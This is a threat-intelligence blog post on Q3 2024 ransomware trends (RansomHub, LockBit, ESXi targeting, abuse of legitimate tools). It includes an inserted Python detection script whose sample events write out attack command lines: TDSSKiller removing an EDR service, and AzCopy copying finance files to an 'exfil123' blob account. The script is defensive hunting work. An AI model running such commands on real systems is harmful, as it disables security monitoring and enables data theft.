Trends in Ransomware Attacks in Q3, 2024
In the latest Q3 Ransomware Report from our team at Cyberint – a Check Point Software company and a leading voice in external cyber-risk management – we’ve placed particular emphasis on comparing the most recent quarter, Q3 2024, to the previous one, Q2 2024, when rates of ransomware incidents reached an all-time high. While Q3 saw a slight decrease of 5.5%, with 1209 cases (down from 1277 in the prior quarter), the numbers are still notably higher than in Q1 2024 and the preceding years.
Here are some key trends and themes as revealed in our report.
A Family Affair
One striking trend is that the top 10 ransomware groups were responsible for just 58.3% of all attacks, pointing to the ongoing rise of a growing number of active black hat groups. This also reflects the declining dominance of such infamous groups as Conti and LockBit, which previously accounted for a broad majority of attacks.
For the first time since 2022, LockBit was no longer the most prolific ransomware group across the quarter. A group called RansomHub has overtaken that dubious title, responsible for 16.1% of Q3 ransomware cases – with a total of 195 victims. LockBit fell to third place with 85 successful attacks, its lowest number in a year-and-a-half.
Regardless of which groups are on top, with the number of active ransomware groups at an all-time high, businesses naturally face an increased risk of attacks. Indeed, the reinvigorated competition between different ransomware groups has fuelled increasingly frequent breaches. These competing gangs are vying for targets with greater fervor and intensity than ever before, leaving little room for error on the part of enterprise cybersecurity teams.
As this proliferating class of ransomware groups continues to scour the web for their next victims, even minor errors can quickly lead to major security incidents.
A Legal Response
Despite the shifting landscape and growth of new major players, increased intervention from governments and law enforcement is helping keep some major ransomware groups at bay. However, while this pressure has notably weakened some key players and will continue to impinge upon experienced gangs, it has also left openings for smaller criminal groups to rise in the ranks. A more diversified landscape with creative new players could yet become even more threatening than one dominated by a few big names.
This is not to discredit the effectiveness of legal crackdowns. These actions have succeeded in creating a less conducive environment for many ransomware groups, signaling that their dominance may be less sustainable than before.
Trends to Watch
In recent years, ransomware groups have increasingly been targeting Linux-based systems and VMware ESXi servers, recognizing them as valuable targets within corporate infrastructures. These systems often host critical virtual machines (VMs) that, if compromised, can quickly lead to more widespread disruption.
Play Ransomware, for instance, has developed a Linux variant to specifically attack VMware ESXi servers, as these servers are widely used in enterprise environments. Since early 2023, VMware has been a major target of ransomware campaigns, exploiting a vulnerability that had been known for over two years. While newer versions have patched the flaw, older, unpatched systems remain exposed to this critical vulnerability, which can be detected and exploited almost completely through automation.
In a similar vein, Cicada3301 Ransomware has also been launching attacks on VMware ESXi servers, while BlackByte has adapted its tactics by targeting vulnerabilities in VMware ESXi to launch attacks that exploit authentication bypass techniques, allowing it to remotely encrypt virtual machines.
This trend is likely a reflection of businesses’ growing reliance on Linux systems to host critical infrastructure. The heightened focus on virtualization environments is also driven by the potential to impact large-scale operations with just one attack, as compromising ESXi servers can lead to the encryption of a plethora of virtualized resources in one fell swoop.
Other notable trends include customized malware and the exploitation of legitimate tools for nefarious purposes.
For example, BlackBasta has adopted custom malware that is more evasive and designed to bypass modern security detection mechanisms, while RansomHub is leveraging legitimate tools like Kaspersky’s TDSSKiller – a free virus removal tool – to disable endpoint detection and response (EDR) software. This allows RansomHub to operate undetected in compromised environments using tools that are less likely to be monitored for misuse.
Legitimate cloud-based tools are also being used for data theft. Take BianLian and Rhysida, both of which were caught pilfering data from victim networks and using Microsoft’s Azure Storage Explorer and AzCopy tools – legitimate cloud-based infrastructure – to store the stolen information.
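As an added example (not code from the Cyberint report), a small Python triage script that flags the living-off-the-land patterns described above in process-creation telemetry: TDSSKiller invoked against a named service, AzCopy uploading local folders to an Azure Blob account outside an assumed allow-list, and Azure Storage Explorer running on an endpoint. The host names, user names, paths and storage-account names are constructed; the -dcsvc switch is TDSSKiller's documented service-removal option and is not cited by the report itself.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
# Host names, users, paths and storage-account names are made up for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "user": "CORP\\alice", "image": "C:\\Tools\\TDSSKiller.exe",
     "cmdline": "TDSSKiller.exe -dcsvc SomeEdrService"},
    {"host": "fs02", "user": "CORP\\svc_backup", "image": "C:\\Users\\Public\\azcopy.exe",
     "cmdline": "azcopy.exe copy D:\\Finance https://exfil123.blob.core.windows.net/c1?sv=x --recursive"},
    {"host": "bk01", "user": "CORP\\svc_backup", "image": "C:\\Program Files\\azcopy\\azcopy.exe",
     "cmdline": "azcopy.exe copy E:\\Backups https://corpbackup.blob.core.windows.net/daily --recursive"},
    {"host": "ws03", "user": "CORP\\bob", "image": "C:\\Program Files\\Azure Storage Explorer\\StorageExplorer.exe",
     "cmdline": "StorageExplorer.exe"},
    {"host": "ws04", "user": "CORP\\carol", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Storage accounts the organisation legitimately uploads to (assumed allow-list).
KNOWN_STORAGE_ACCOUNTS = {"corpbackup"}
BLOB_URL_RE = re.compile(r"^https://([a-z0-9]+)\.blob\.core\.windows\.net/", re.I)

def azcopy_upload_account(cmdline: str) -> Optional[str]:
    """Return the destination storage account if this is a local-to-blob AzCopy upload."""
    tokens = cmdline.split()
    if len(tokens) < 4 or tokens[1].lower() != "copy":
        return None
    src, dst = tokens[2], tokens[3]
    m = BLOB_URL_RE.match(dst)
    if m and not src.lower().startswith("http"):
        return m.group(1).lower()
    return None

def classify(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Map one process-creation event to zero or more findings tagged with host and user."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    out: List[Dict[str, str]] = []
    if image == "tdsskiller.exe":
        # A rootkit remover is rare in routine operations; with -dcsvc it removes a named
        # service, which is how it has been abused to stop EDR agents.
        sev = "high" if "-dcsvc" in cmd.lower() else "medium"
        out.append({"rule": "security_tool_tamper_via_tdsskiller", "severity": sev})
    elif image == "azcopy.exe":
        acct = azcopy_upload_account(cmd)
        if acct is not None:
            sev = "info" if acct in KNOWN_STORAGE_ACCOUNTS else "high"
            out.append({"rule": "azcopy_upload_to_blob", "severity": sev, "account": acct})
    elif image == "storageexplorer.exe":
        out.append({"rule": "azure_storage_explorer_on_endpoint", "severity": "low"})
    return [dict(f, host=event["host"], user=event["user"]) for f in out]

def triage(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    return [f for e in events for f in classify(e)]
```

Feeding real Sysmon or Windows 4688 events into triage() instead of SAMPLE_EVENTS gives a first-pass hunt for the two techniques the report attributes to RansomHub, BianLian and Rhysida.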
Implications for the Future
The pace of ransomware attacks shows no signs of slowing.
Despite shifting trends and increased pressure from authorities, cybercriminals are ultimately financially motivated, and ransomware attacks continue to be lucrative. As these gangs become more successful and well-funded, their exploitative capabilities become increasingly sophisticated and more difficult to predict or prevent.
Not only must businesses keep up their guard regarding traditional threat vectors – e.g., phishing attacks, stolen credentials, or exploited vulnerabilities within internet-facing assets – but they must brace for newfound creativity and sophistication from increasingly agile ransomware groups as well.
Accordingly, businesses must adopt a security posture that is more strategic, comprehensive, and up to date than ever before. Staying aware of the ransomware trends is the first step towards doing so.
About the Author
Adi Bleih is a Cybersecurity Researcher with 7 years of experience in the threat intelligence and incident response fields, and a strong understanding of the threat landscape, intelligence and cyberattack techniques, network security and mitigation strategies.